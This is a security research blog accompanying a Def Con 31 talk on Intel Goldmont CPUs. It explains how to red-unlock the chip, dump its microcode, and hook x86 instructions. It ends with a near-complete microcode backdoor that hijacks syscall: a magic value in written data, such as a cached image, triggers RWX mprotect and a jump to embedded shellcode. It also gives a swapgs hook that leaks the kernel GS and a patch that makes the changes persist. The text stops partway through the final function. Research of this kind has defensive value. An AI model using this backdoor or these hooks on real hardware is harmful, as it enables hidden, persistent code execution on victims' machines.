Hello! In this exploit development and cybersecurity training blog, we will be exploring the depths of Intel SOC CPUs, conducting vulnerability research, and embedding a backdoor deep inside a CPU core by modifying the microcode that makes up the x86 instruction set. We will have a look at Intel’s microarchitecture for the Goldmont CPU series focusing on the Microcode Sequencer (MS).
Normally we think of assembly instructions as atomic operations handled by transistors and hardware. This is only partly true, as modern CISC CPUs translate "high-level" instructions into microcode instructions. We will refer to these as macro and micro instructions, respectively, throughout this post.
This post is an in-depth continuation of the talk I gave at Def Con 31. The talk is worth watching before reading, but it is not required. Talk and slides can be found here: Link
Prerequisites and Requirements
To reproduce any findings described throughout this blog post, one will need the following:
- A red unlocked Intel Goldmont CPU, preferably soldered to a dev board 🙂
- build-essentials (gcc, make etc.)
- SPI flash programmer
During this research project, we used the UP Squared dev boards, which can be found here.
This has ONLY been TESTED with the Intel® Pentium® N4200 CPU. To red unlock it, one can follow the instructions from IntelTXE-PoC with some modifications to the ROP chain, as we weren't able to get the UP board to boot without them. The changes can be found at https://github.com/zanderdk/lib-micro/blob/master/bin/exploit.py. We also provide a pre-built image which already comes with an exploit for the Intel Management Engine.
To flash the board, hook up an SPI programmer as detailed in the coreboot docs and flash the pre-built image using the following command:
sudo flashrom --programmer ch341a_spi -w <path_to_image>
To test if the CPU is in a red unlocked state, we can try to write to the hidden enable bit for microarchitectural instructions, using the wrmsr (write model-specific register) command-line utility for Linux: sudo wrmsr --all 0x1e6 0x200
If we read back the same value using sudo rdmsr 0x1e6, the CPU is red unlocked and all cores have enabled the undocumented instructions for microcode debugging.
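The same check can be sketched in C. This is a minimal sketch, assuming the Linux msr driver is loaded (modprobe msr) so that each core's MSRs are readable at /dev/cpu/N/msr, and assuming, based only on the command above, that 0x200 is the enable bit in MSR 0x1e6. The helper names are ours and are not part of lib-micro.

```c
#define _XOPEN_SOURCE 700 /* for pread() */
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

#define MSR_UDBG_ENABLE     0x1e6u   /* MSR index from the wrmsr command above */
#define MSR_UDBG_ENABLE_BIT 0x200ull /* value written above; assumed to be the enable bit */

/* Pure check: does a value read back from the MSR have the enable bit set? */
static inline int udbg_bit_set(uint64_t msr_value) {
    return (msr_value & MSR_UDBG_ENABLE_BIT) != 0;
}

/* Read one MSR on one core through the Linux msr driver.
 * Returns 0 on success, -1 on any error (no driver, no root, no such core). */
static inline int read_msr(unsigned cpu, uint32_t msr, uint64_t *out) {
    char path[64];
    assert(out != NULL);
    snprintf(path, sizeof path, "/dev/cpu/%u/msr", cpu);
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    /* the msr driver uses the file offset as the MSR index */
    ssize_t n = pread(fd, out, sizeof *out, (off_t)msr);
    close(fd);
    return n == (ssize_t)sizeof *out ? 0 : -1;
}

/* 1 = debug instructions enabled on this core, 0 = not enabled, -1 = could not read. */
static inline int core_is_red_unlocked(unsigned cpu) {
    uint64_t value;
    if (read_msr(cpu, MSR_UDBG_ENABLE, &value) != 0)
        return -1;
    return udbg_bit_set(value);
}
```

Calling core_is_red_unlocked(0) as root gives the same answer for core 0 as the rdmsr command; a result of -1 only means the MSR could not be read.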
Debug Instructions
To access the microcode sequencer, we need write access to the control register bus (CRBUS), which we gain by unlocking the debug macro instructions as described in this article by Mark Ermolov et al. In the lib-micro source, we find the following implementations for CRBUS reads and writes:
__attribute__((always_inline))
u_result_t static inline udbgrd(uint64_t type, uint64_t addr) {
lmfence();
u_result_t res;
asm volatile(
".byte 0x0F, 0x0E\n\t" // udbg instruction for reading
: "=d" (res.value)
, "=b" (res.status)
: "a" (addr)
, "c" (type)
);
lmfence();
return res;
}
__attribute__((always_inline))
u_result_t static inline udbgwr(uint64_t type, uint64_t addr, uint64_t value) {
uint32_t value_low = (uint32_t)(value & 0xFFFFFFFF);
uint32_t value_high = (uint32_t)(value >> 32);
u_result_t res;
lmfence();
asm volatile(
".byte 0x0F, 0x0F\n\t" // udbg instruction for writing
: "=d" (res.value)
, "=b" (res.status)
: "a" (addr)
, "c" (type)
, "d" (value_low)
, "b" (value_high)
);
lmfence();
return res;
}
#define SIMPLERD(name, type) \
__attribute__((always_inline)) \
u64 static inline name(u64 addr) { \
return (u64)udbgrd(type, addr).value; \
}
SIMPLERD(crbus_read, 0x00) // reading crbus
SIMPLEWR(crbus_write, 0x00) // writing crbus (SIMPLEWR wraps udbgwr in the same way; its definition is not shown here)
Above, we define C wrappers for the read and write microarchitectural debug instructions. The rcx register specifies the access type, where 0x00 means the control register bus, and rax is the address we read from or write to. For writes, the data is passed in edx (low 32 bits) and ebx (high 32 bits); the result comes back in rdx, with a status in rbx.
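To make the register convention concrete, here is a small sketch that only models how udbgwr splits a 64-bit value across registers. The udbg_regs_t struct and both helpers are hypothetical names of ours, not part of lib-micro, and nothing here executes the debug instruction.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical container for the register values that udbgwr loads. */
typedef struct {
    uint64_t rax; /* address on the selected bus */
    uint64_t rcx; /* access type, 0x00 = CRBUS */
    uint32_t edx; /* low 32 bits of the data */
    uint32_t ebx; /* high 32 bits of the data */
} udbg_regs_t;

/* Split a write request into registers the same way udbgwr does. */
static inline udbg_regs_t udbg_pack_write(uint64_t type, uint64_t addr, uint64_t value) {
    udbg_regs_t r;
    r.rax = addr;
    r.rcx = type;
    r.edx = (uint32_t)(value & 0xFFFFFFFFu);
    r.ebx = (uint32_t)(value >> 32);
    return r;
}

/* Recombine the two halves into the original 64-bit value. */
static inline uint64_t udbg_unpack_value(udbg_regs_t r) {
    return ((uint64_t)r.ebx << 32) | r.edx;
}

/* Usage: a CRBUS write of 0x1 to 0x692 keeps ebx at zero. */
static inline void udbg_pack_example(void) {
    udbg_regs_t r = udbg_pack_write(0x00, 0x692, 0x1);
    assert(r.edx == 0x1 && r.ebx == 0x0);
    assert(udbg_unpack_value(r) == 0x1);
}
```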
The CRBUS connects internal components of the CPU. One of these is the Local Direct Access Test (LDAT), from which we can program and inspect various IP units, one of which is the Microcode Sequencer, which has the port index 0x6a0. Below is the implementation from lib-micro for writing to LDAT and MS:
void ldat_array_write(u64 pdat_reg, u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr, u64 val) {
u64 prev = crbus_read(0x692); //disable CPU frontend
crbus_write(0x692, prev | 1);
crbus_write(pdat_reg + 1, 0x30000 | ((dword_idx & 0xf) << 12) | ((array_sel & 0xf) << 8) | (bank_sel & 0xf));
crbus_write(pdat_reg, 0x000000 | (fast_addr & 0xffff));
crbus_write(pdat_reg + 4, val & 0xffffffff);
crbus_write(pdat_reg + 5, (val >> 32) & 0xffff);
crbus_write(pdat_reg + 1, 0);
crbus_write(0x692, prev); //enable CPU frontend
}
void ms_array_write(u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr, u64 val) {
ldat_array_write(0x6a0 /* MS */, array_sel, bank_sel, dword_idx, fast_addr, val);
}
u64 ms_array_read(u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr) {
return ldat_array_read(0x6a0 /* MS */, array_sel, bank_sel, dword_idx, fast_addr); // ldat_array_read is implemented using microcode and explained later
}
LDAT is segmented into arrays, banks, words and addresses, but we will only focus on arrays and addresses, as the bank and word indices for the MS are always zero. The microcode ROM is stored in arrays 0 and 1, and the RAM in arrays 2 and 4. For a deeper understanding of these arrays, we refer to the lib-micro documentation.
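The selector word that ldat_array_write puts in pdat_reg + 1 can be computed on its own. The sketch below copies the bit layout from the code above (4-bit fields for dword index, array and bank) and also covers the 0x10000 prefix that the read variant later in this post uses. The function and macro names are ours, and the meaning of the two prefixes is an assumption taken purely from how the code uses them.

```c
#include <assert.h>
#include <stdint.h>

#define LDAT_MODE_WRITE 0x30000u /* prefix used by ldat_array_write */
#define LDAT_MODE_READ  0x10000u /* prefix used by ldat_array_read */

/* Build the selector word written to pdat_reg + 1. */
static inline uint64_t ldat_selector(uint64_t mode, uint64_t array_sel,
                                     uint64_t bank_sel, uint64_t dword_idx) {
    /* each field is masked with 0xf in the lib-micro code */
    assert(array_sel <= 0xf && bank_sel <= 0xf && dword_idx <= 0xf);
    return mode | (dword_idx << 12) | (array_sel << 8) | bank_sel;
}
```

For the MS, where bank and word index are always zero, a write to array 4 gives ldat_selector(LDAT_MODE_WRITE, 4, 0, 0) == 0x30400.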
Now we are at a point where we can start writing to the microcode RAM area:
void patch_ucode(u64 addr, ucode_t ucode_patch[], int n) { //write microcode patches
// format: uop0, uop1, uop2, seqword
// uop3 is fixed to a nop and cannot be overridden
for (int i = 0; i < n; i++) {
// patch ucode
ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+0, CRC_UOP(ucode_patch[i].uop0)); //write to array 4
ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+1, CRC_UOP(ucode_patch[i].uop1));
ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+2, CRC_UOP(ucode_patch[i].uop2));
// patch seqword
ms_rw_seq_write(ucode_addr_to_patch_seqword_addr(addr) + i, CRC_SEQ(ucode_patch[i].seqw)); //write to array 2 (RW SEQ)
}
}
The code above will write to MS RAM, which starts at address 0x7c00 and ends at 0x8000. For a detailed overview, look here.
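Before writing a patch it is handy to check that it fits in this window. The following is a minimal sketch of such a check. It assumes that 0x8000 is an exclusive end, that a patch should start on a triad boundary, and that each triad takes four addresses (three uops plus the fixed nop slot), as patch_ucode suggests. The helper name is ours.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define MS_RAM_START 0x7c00u
#define MS_RAM_END   0x8000u /* assumed to be exclusive */

/* True if n_triads triads starting at addr lie entirely inside MS RAM. */
static inline bool patch_fits_in_ms_ram(uint64_t addr, uint64_t n_triads) {
    if (addr % 4 != 0)
        return false; /* assumption: patches start on a triad boundary */
    if (addr < MS_RAM_START || addr >= MS_RAM_END)
        return false;
    return n_triads <= (MS_RAM_END - addr) / 4;
}

/* Usage: a one-triad patch at the start of MS RAM fits, a ROM address does not. */
static inline void patch_fits_example(void) {
    assert(patch_fits_in_ms_ram(0x7c00, 1));
    assert(!patch_fits_in_ms_ram(0x0870, 1));
}
```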
Dumping Microcode
Let’s write some microcode! The first thing we are going to write will dump the microcode ROM area. In the code below, we use the macro language from lib-micro to assemble microcode.
Microcode is stored in triads, which are sets of three micro instructions under the control of a sequence word. The sequence word controls execution flow, but for this example, we will only be using NOP_SEQWORD, which does nothing and continues execution in the following triad.
Microcode supports encoding immediate values, registers, addresses and macro aliases, but for now we will only be using registers and immediates.
We annotate a destination register with a D, operand registers with R, and immediate values with I.
Example encoding:
- MOVE_DSZ64_DR: moves from register to register, and can be read as "move with data size of 64 bits with destination and operand register"
- ZEROEXT_DSZ32_DI: sets a register to an immediate value, and can be read as "zero extend with data size of 32 bits with destination and immediate value"
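The naming convention is regular enough to decode mechanically. The sketch below is a toy helper of ours (not part of lib-micro) that reads the suffix after the last underscore and spells out each operand. Treating M as "macro alias" is an assumption based on macros such as ZEROEXT_DSZ64_DM used later in this post.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Returns the operand suffix (text after the last '_'), e.g. "DRI". */
static inline const char *operand_suffix(const char *macro_name) {
    const char *underscore = strrchr(macro_name, '_');
    return underscore ? underscore + 1 : macro_name;
}

/* Maps one suffix letter to a human-readable operand kind. */
static inline const char *operand_kind(char c) {
    switch (c) {
    case 'D': return "destination register";
    case 'R': return "operand register";
    case 'I': return "immediate";
    case 'M': return "macro alias"; /* assumption, see lead-in */
    default:  return "unknown";
    }
}

/* Writes a comma-separated description of the operands into out. */
static inline void describe_operands(const char *macro_name, char *out, size_t out_len) {
    assert(out != NULL && out_len > 0);
    out[0] = '\0';
    for (const char *p = operand_suffix(macro_name); *p != '\0'; p++) {
        size_t used = strlen(out);
        snprintf(out + used, out_len - used, "%s%s",
                 used ? ", " : "", operand_kind(*p));
    }
}
```

Names without an operand suffix, such as NOP, are not handled by this sketch.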
In microcode, we have access to more than the normal x86 registers: there are 16 temporary registers, named tmp0-tmp15, which are internal to the CPU core and hidden from the macro world.
For more details on how micro-operations are encoded, we again refer to the lib-micro documentation.
Microcode implementing a read from the LDAT:
unsigned long addr = 0x7de0; //location in microcode RAM
ucode_t ucode_patch[] = { // Microcode implementation for reading from LDAT
{ // 0x7de0
// grab arguments from macro world registers (RDI, RSI, RDX)
MOVE_DSZ64_DR(TMP0, RDI), //move port id to TMP0
MOVE_DSZ64_DR(TMP1, RSI), //array index
MOVE_DSZ64_DR(TMP2, RDX), //address to read
NOP_SEQWORD
},
{ // 0x7de4
ZEROEXT_DSZ32_DI(TMP10, 0x0),
ADD_DSZ32_DRI(TMP11, TMP0, 0x1),
ADD_DSZ32_DRI(TMP12, TMP0, 0x2),
NOP_SEQWORD
},
{ // 0x7de8
// pause frontend
MOVEFROMCREG_DSZ64_DI(TMP9, 0x38c),
MOVETOCREG_DSZ64_RI(TMP10, 0x38c),
MOVEFROMCREG_DSZ64_DR(TMP13, TMP11),
NOP_SEQWORD
},
{ // 0x7dec
MOVETOCREG_DSZ64_RR(TMP1, TMP11),
MOVETOCREG_DSZ64_RR(TMP2, TMP0),
MOVEFROMCREG_DSZ64_DR(RAX, TMP12), //read resulting value from CRBUS
NOP_SEQWORD
},
{ // 0x7df0
MOVETOCREG_DSZ64_RR(TMP10, TMP11),
MOVETOCREG_DSZ64_RI(TMP9, 0x38c),
NOP,
END_SEQWORD
},
};
The microcode above performs the same sequence as ldat_array_write implemented in C, except that the write is replaced by a read into the rax register. We can now include this code in our C project and start dumping the microcode ROM:
u64 ldat_array_read(u64 pdat_reg, u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr) {
#include "ucode/ldat_read.h" //code from above
patch_ucode(addr, ucode_patch, ARRAY_SZ(ucode_patch)); //insert the microcode patch at 0x7de0
u64 array_bank_sel = 0x10000 | ((dword_idx & 0xf) << 12) | ((array_sel & 0xf) << 8) | (bank_sel & 0xf);
u64 res = ucode_invoke_3(addr, pdat_reg, array_bank_sel, 0xc00000 | fast_addr);
return res; // will contain the value of rax returned by microcode
}
Wait, where did ucode_invoke_3 come from?
Another feature of the undocumented udbgwr instruction is a microcode jump: if we place the value 0xd8 into rcx, the CPU treats rax as an address in the microcode ROM/RAM address space and jumps directly to that address. Using that information, we can construct C functions for invoking arbitrary microcode addresses, as shown below:
__attribute__((always_inline))
u64 static inline ucode_invoke_3(u64 addr, u64 arg1, u64 arg2, u64 arg3) {
u64 rax = addr, rcx = 0xD8; //select ucode jump mode
lmfence(); //memory fences for safety
asm volatile(
".byte 0x0F, 0x0F\n\t" //magic udbgwr instruction
: "+a" (rax)
, "+c" (rcx)
, "+D" (arg1) // rdi
, "+S" (arg2) // rsi
, "+d" (arg3) // rdx
:
: "rbx", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"
);
lmfence();
return rax;
}
Now let’s dump it! All we have to do is read from the LDAT in a loop and print the value, and we can dump the microcode ROM and start analyzing:
void ms_array_dump(u64 array_sel, u64 fast_addr, u64 size) {
for (; fast_addr < size; fast_addr+=4) { // loop & read
u64 val0 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr);
u64 val1 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+1);
u64 val2 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+2);
u64 val3 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+3);
printf("%04lx: %012lx %012lx %012lx %012lx\n", fast_addr, val0, val1, val2, val3); //print result to stdout
}
}
//implement wrapper for all the 5 MS arrays as described in lib-micro docs.
void ms_ro_code_dump(void){
puts("array 00:");
ms_array_dump(0, 0, 0x7e00);
}
void ms_ro_seqw_dump(void){
puts("array 01:");
ms_array_dump(1, 0, 0x8000);
}
void ms_rw_seqw_dump(void){
puts("array 02:");
ms_array_dump(2, 0, 0x80);
}
void ms_match_n_patch_dump(void){
puts("array 03:");
ms_array_dump(3, 0, 0x20);
}
void ms_rw_code_dump(void){
puts("array 04:");
ms_array_dump(4, 0, 0x200);
}
Woo, we now have a dump of the microcode ROM, and using uCodeDisasm we can disassemble the micro instructions into readable opcodes.
Hooking Instructions
With the microcode ROM dumped and disassembled, let’s have a look at how we can change behaviour and modify macro instructions. Another feature of the microcode sequencer is array 3, which consists of 32 match & patch registers. Through trial and error, we arrived at the following semantics for these registers.
The registers are divided into three bit fields, where src and dst are two microcode addresses shifted right by one bit, and p is a present bit. In ucode_glm.txt we find the disassembled ROM extracted using the above methods. Let’s try to program a match & patch register to make a simple change. In lables.txt we find all the xlats (macro instruction entry points in the MS ROM) we have identified so far, one of which is swapgs_xlat. This is the swapgs instruction, which swaps the kernel and user-space values of the gs segment register:
swapgs_xlat:
U0870: 006302033200 tmp3:= READURAM(0x0002, 64) // read saved GS
U0871: 0c4b20372000 tmp2:= RDSEGFLD(GS, BASE) // read current GS
U0872: 100a02000200 TESTUSTATE(SYS, UST_USER_MODE)
01a711c0 ? SEQW GOTO generate_#GP
// bail if not in privileged mode, by jumping to Ucode generating
// General protection fault.
U0874: 0c7b2d000033 WRSEGFLD(tmp3, GS, BASE)
// write new effective GS
U0875: 204302000232 LFNCEMARK-> WRITEURAM(tmp2, 0x0002, 64)
// Save old GS
04808e72 SEQW GOTO lfence_wait_uend0
// Jump to Ucode for lfence instruction which also uend's the current
// macro instruction. We need this memory barrier as GS is a memory
// segmentation register.
In the microcode above, we also see a branch made from the sequence word. Encoded in the first sequence word is a branch to the Ucode address U2711 == generate_#GP. Because the micro instruction selected by the uip (micro instruction pointer) encoded in the sequence word is a TESTUSTATE, the branch after executing U0872 becomes conditional on the test result.
Let’s program the following value into a match & patch register: (0x0874 >> 1) << 16 | (0x0872 >> 1) | 1 == 0x43A0439
This puts a hook on 0x872 and makes it jump to 0x874. For this xlat, we can achieve it with the following C expression:
hook_match_and_patch(0, 0x872 /* src address */, 0x874 /* dst address */);
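The arithmetic behind that register value can be checked with a few lines of C. This sketch follows the expression exactly as written in the text. The function name is ours, and the real field layout used inside hook_match_and_patch may differ from this simplified packing.

```c
#include <assert.h>
#include <stdint.h>

/* Pack a match & patch value as in the text:
 * (dst >> 1) << 16 | (src >> 1) | present bit. */
static inline uint32_t match_patch_value(uint32_t src, uint32_t dst) {
    assert(src <= 0xffff && dst <= 0xffff); /* microcode addresses are 16 bits here */
    return ((dst >> 1) << 16) | (src >> 1) | 1u;
}

/* Usage: the swapgs hook from the text. */
static inline void match_patch_example(void) {
    assert(match_patch_value(0x0872, 0x0874) == 0x043A0439u);
}
```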
Wooo, we changed swapgs from a privileged instruction to a user-space instruction by skipping the check, and we can verify this by running:
uint rax = 0x0;
asm volatile(
"swapgs\n\t"
"mov ax, gs\n\t"
"swapgs\n\t"
: "=a" (rax)
);
This will leak the kernel gs from user-space. We do the swap twice so as not to crash the kernel, leaving the kernel gs as it was. But if we put this in a big loop, we will start observing 0x0 after running for some time…
Hidden side-effect
Through a lot of digging and failed hooks, we discovered hidden side effects placed by Intel in the port I/O macro instructions. These instructions verify the microcode state and reset it if changes are detected. This is also why CustomProcessingUnit fails to persist microcode changes after booting Linux, and they only persist while still in a UEFI shell. When we tried porting the repository to user space, at first nothing seemed to work. Then we realized that we were actually successful in applying a microcode update; it was just very quickly being overwritten with the original update again. After some experimenting, we found that this overwrite would not happen if we kept the processor busy, and as soon as we made a long enough sleep call or exited the process, it would get overwritten.
We suspected that the overwrite was being done from within the microcode itself, and used this knowledge to trace the entire microcode ROM to create a list of candidate microcode addresses. We eventually traced it all the way down to the exact instruction that led our hook to be overwritten. We created a hook to dump the current value of RIP (macro instruction pointer) and found that the microcode in question was being called from the function acpi_idle_do_entry in the Linux kernel. Specifically, the in al, dx instruction triggered the code path. In the Linux kernel source code, the function is described as "acpi_idle_do_entry - enter idle state using the appropriate method". This matches our previous observations that the overwrites only happened when we let the processor idle. We then created a hook to completely skip that branch of the IN instruction, and our microcode was no longer being overwritten. The following code snippet makes all microcode changes persist:
void do_fix_IN_patch() {
// Patch U58ba to U017a
hook_match_and_patch(0x1f, 0x58ba, 0x017a);
}
We will not include the full trace of in, as it is huge, but it can be found in the ROM dump above.
// much microcode above
U58b4: 000100032cf2 tmp2:= OR_DSZ32(tmp2, tmp3)
U58b5: 00621d034200 tmp4:= MOVEFROMCREG_DSZ64(0x01d)
U58b6: 002501034234 tmp4:= SHR_DSZ32(tmp4, 0x00000001)
U58b8: 000400032d32 tmp2:= AND_DSZ32(tmp2, tmp4)
U58b9: 000700031c72 tmp1:= NOTAND_DSZ32(tmp2, tmp1)
U58ba: 01507a040231 LFNCEMARK-> UJMPCC_DIRECT_NOTTAKEN_CONDZ(tmp1, U017a)
// force the branch above using match & patch register ^^^^^^^^^^^^^^^^^^^^^
U58bc: 00010003c000 tmp12:= OR_DSZ32(0x00000000)
U58bd: 00ed04030230 tmp0:= ROR_DSZ8(tmp0, 0x00000004)
U58be: 00c001030230 tmp0:= ADD_DSZ8(tmp0, 0x00000001)
U58c0: 002408034230 tmp4:= SHL_DSZ32(tmp0, 0x00000008)
U58c1: 00040f030c08 tmp0:= AND_DSZ32(0x0000000f, tmp0)
U58c2: 000502032c08 tmp2:= SUB_DSZ32(0x00000002, tmp0)
U58c4: 0352d06002b2 LFNCEWTMRK-> UJMPCC_DIRECT_NOTTAKEN_CONDLE(tmp2, U58d0)
U58c5: 2d0bc8031008 tmp1:= PORTIN_DSZ32_ASZ16_SC1(0x00c8)
U58c6: 002510031231 tmp1:= SHR_DSZ32(tmp1, 0x00000010)
// much microcode below
Writing a Backdoor
Now for the fun part, let’s hide a backdoor in the instruction set!
There are a lot of instructions in the x86 instruction set. Many of them are implemented in microcode, which lets us hook them. We utilize the fact that all browsers cache files, such as images, that are downloaded from websites: we hook the syscall instruction and check whether a write syscall is being run. If the data contains our magic value, we change the syscall to mprotect, making the data RWX, and then execute the data as shellcode.
Syscall
Before diving deep into the backdoor, let’s have a quick look at the implementation of the syscall instruction from microcode:
syscall_xlat:
U02e0: 000b01833200 tmp3:= UPDATEUSTATE(!0x04)
U02e1: 006384034200 LFNCEMARK-> tmp4:= READURAM(0x0084, 64) // IA32_LSTAR?
U02e2: 006382031200 tmp1:= READURAM(0x0082, 64) // IA32_LSTAR?
048bb296 SEQW SAVEUIP1 U02e4
SEQW GOTO U0bb2
U02e4: 006520030230 tmp0:= SHR_DSZ64(tmp0, 0x00000020)
U02e5: 008703030c08 tmp0:= NOTAND_DSZ16(0x00000003, tmp0)
U02e6: 004804821008 rcx:= ZEROEXT_DSZ64(IMM_MACRO_ALIAS_RIP)
// Store the address of the next user-space instruction into rcx. ^^^^
0181d280 SEQW GOTO U01d2
The Intel manual opens its description of syscall with the following:
SYSCALL invokes an OS system-call handler at privilege level 0. It does so by loading RIP from the IA32_LSTAR MSR (after saving the address of the instruction following SYSCALL into RCX). (The WRMSR instruction ensures that the IA32_LSTAR MSR always contain a canonical address.)
This is exactly what we also read from the microcode implementation. Keep this in mind, as it becomes important later.
Implementation
Below is the full implementation of the backdoor used in our demo at Defcon 31, which we will try to explain step by step using comments. A more readable pseudocode version can be found in our slides as well.
unsigned long addr = 0x7d30; // Ucode RAM address where we place ucode
unsigned long hook_address = 0x02e0; // syscall_xlat (syscall entry point)
ucode_t ucode_patch[] = {
{ // 0x0
XOR_DSZ64_DRI(TMP5, RAX, 0x1), // check RAX for SYS_WRITE
UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(TMP5, addr+0x6),
XOR_DSZ64_DRI(TMP5, RAX, 0x12),
// check RAX for pwrite64 a variant of SYS_WRITE
NOP_SEQWORD
},
{ // 0x4
UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(TMP5, addr+0x6),
UJMP_I(addr+0x2c),
UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(RSI, addr+0x2c),
// check RSI is not 0x0 and if not assume to be a valid pointer
NOP_SEQWORD
},
{ // 0x8
ZEROEXT_DSZ64_DI(TMP6, 0xd00d),
CONCAT_DSZ16_DRI(TMP6, TMP6, 0xf00d), //put 0xd00df00d into TMP6
ADD_DSZ64_DRI(TMP4, RSI, 0xd8), // tmp4 = rsi + 0xd8
NOP_SEQWORD
},
{ // 0xc
LDZX_DSZ64_ASZ32_SC1_DR(TMP5, TMP4, 0x18), //read magic value from memory
XOR_DSZ64_DRR(TMP5, TMP5, TMP6), //check if we found magic in image data
UJMPCC_DIRECT_NOTTAKEN_CONDNZ_RI(TMP5, addr+0x2c), // bail out if not
NOP_SEQWORD
},
{ // 0x10
// Save regs
// We now save the current register state to memory/image data.
// This is done so we can recover the execution state from memory when
// we finally achieve macro-level shellcode.
ZEROEXT_DSZ64_DM(TMP5, IMM_MACRO_ALIAS_RIP),
SUB_DSZ64_DIR(TMP5, 0x2, TMP5),
STAD_DSZ64_ASZ32_SC1_RRI(TMP5, TMP4, 0x0, SEG_DS),
NOP_SEQWORD
},
{ // 0x14
STAD_DSZ64_ASZ32_SC1_RRI(RAX, TMP4, 0x8, SEG_DS),
STAD_DSZ64_ASZ32_SC1_RRI(RDI, TMP4, 0x10, SEG_DS),
STAD_DSZ64_ASZ32_SC1_RRI(RSI, TMP4, 0x18, SEG_DS),
NOP_SEQWORD
},
{ // 0x18
STAD_DSZ64_ASZ32_SC1_RRI(RDX, TMP4, 0x20, SEG_DS),
NOP,
// Overwrite regs
// now we modify the register state to prepare a mprotect syscall.
ADD_DSZ64_DRI(TMP5, RSI, 0x100), // jmp rsi+0x100
// ^^^^^^^^^^^^^^^^^^^^^^^ IMPORTANT ^^^^^^^^^^^^^^^^^^^^^^
// We calculate an address into the image data where we have put
// shellcode and save it to TMP5.
NOP_SEQWORD
},
{ // 0x1c
// Now we setup arguments for syscall to do an mprotect instead of
// intended write syscall:
// int mprotect(void *addr, size_t len, int prot);
SUB_DSZ64_DIR(RDI, 0x1000, 0),
AND_DSZ64_DRR(RDI, RDI, RSI), // rdi = rsi & ~0xfff, first argument
// We set addr to rsi & ~0xfff for page alignment.
// This is the area we want to be RWX
ZEROEXT_DSZ64_DI(RSI, 0x2000), // rsi = 0x2000, size
NOP_SEQWORD
},
{ // 0x20
ZEROEXT_DSZ64_DI(RDX, 0x7), // rdx = PROT_READ | PROT_WRITE | PROT_EXEC == 0x7
// above we set the new memory protection flags
ZEROEXT_DSZ64_DI(RAX, 0xa), // rax = mprotect
// finally we change the syscall from a SYS_WRITE to a SYS_MPROTECT
UJMP_I(addr+0x2d),
NOP_SEQWORD
},
{ // 0x24
UJMPCC_DIRECT_NOTTAKEN_CONDNZ_RI(TMP5, addr+0x26),
UJMP_I(addr+0x28),
MOVE_DSZ64_DR(RCX, TMP5),
// ^^^^^^^^^^^^^^^^^^^^^^^ IMPORTANT ^^^^^^^^^^^^^^^^^^^^^^
// This is the final trick!
// Change the return address of the syscall instruction stored in RCX.
// This will make the kernel "think" it should return to our shellcode
// after handling an MPROTECT! of the same area.
SEQ_GOTO2(addr+0x29) | SEQ_NOSYNC
},
{ // 0x28
ZEROEXT_DSZ64_DM(RCX, IMM_MACRO_ALIAS_RIP),
SHR_DSZ64_DRI(TMP0, TMP0, 0x20),
NOTAND_DSZ16_DIR(TMP0, 0x3, TMP0),
SEQ_GOTO2(0x1d2) | SEQ_NOSYNC
},
{ // 0x2c Execute first few instructions in normal syscall
XOR_DSZ64_DRR(TMP5, TMP5, TMP5),
UPDATEUSTATE_NOT_I(0x1) | DST_ENCODE(TMP3),
READURAM_DI(TMP4, 0x84),
SEQ_GOTO2(0x2e2) | SEQ_NOSYNC
}
};
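To follow the control flow without reading uops, here is a plain C model of the register rewrite that the patch performs. It runs on an ordinary byte buffer and does nothing at the microcode level. It is a sketch under several assumptions of ours: the magic is read as a 64-bit value at rsi + 0xd8 (we assume the 0x18 argument of the load is a segment selector, not an offset), next_rip stands for IMM_MACRO_ALIAS_RIP, and the length check exists only in the model, not in the microcode. All names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define NR_WRITE      0x1ull
#define NR_PWRITE64   0x12ull
#define NR_MPROTECT   0xaull
#define MAGIC         0xd00df00dull
#define MAGIC_OFF     0xd8u  /* TMP4 = RSI + 0xd8 */
#define SHELLCODE_OFF 0x100u /* TMP5 = RSI + 0x100 */

typedef struct { uint64_t rax, rdi, rsi, rdx, rcx; } regs_t;

/* buf models the user buffer that RSI points to.
 * Returns true when the patch would take the backdoor path. */
static inline bool model_syscall_hook(regs_t *r, uint8_t *buf, size_t len,
                                      uint64_t next_rip) {
    assert(r != NULL && buf != NULL);
    r->rcx = next_rip; /* normal syscall behaviour */

    if (r->rax != NR_WRITE && r->rax != NR_PWRITE64)
        return false;
    if (r->rsi == 0 || len < MAGIC_OFF + 5 * sizeof(uint64_t))
        return false; /* length check is model-only */

    uint64_t magic;
    memcpy(&magic, buf + MAGIC_OFF, sizeof magic);
    if (magic != MAGIC)
        return false;

    /* save RIP of the syscall instruction (2 bytes long) and the arguments */
    uint64_t saved[5] = { next_rip - 2, r->rax, r->rdi, r->rsi, r->rdx };
    memcpy(buf + MAGIC_OFF, saved, sizeof saved);

    uint64_t shellcode = r->rsi + SHELLCODE_OFF;
    r->rdi = r->rsi & ~0xfffull; /* page-aligned addr */
    r->rsi = 0x2000;             /* len */
    r->rdx = 0x7;                /* PROT_READ | PROT_WRITE | PROT_EXEC */
    r->rax = NR_MPROTECT;
    r->rcx = shellcode;          /* kernel "returns" here after mprotect */
    return true;
}
```

In this model, a write of a buffer carrying the magic at offset 0xd8 leaves the registers set up for mprotect with RCX pointing 0x100 bytes into the same buffer, while any other syscall passes through with RCX set to the normal return address.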
Now, with the in side effect gone and the above microcode patch, we can finally place the backdoor using the following C code:
void do_syscall_patch() {
#include "ucode/syscall.h" // code from above
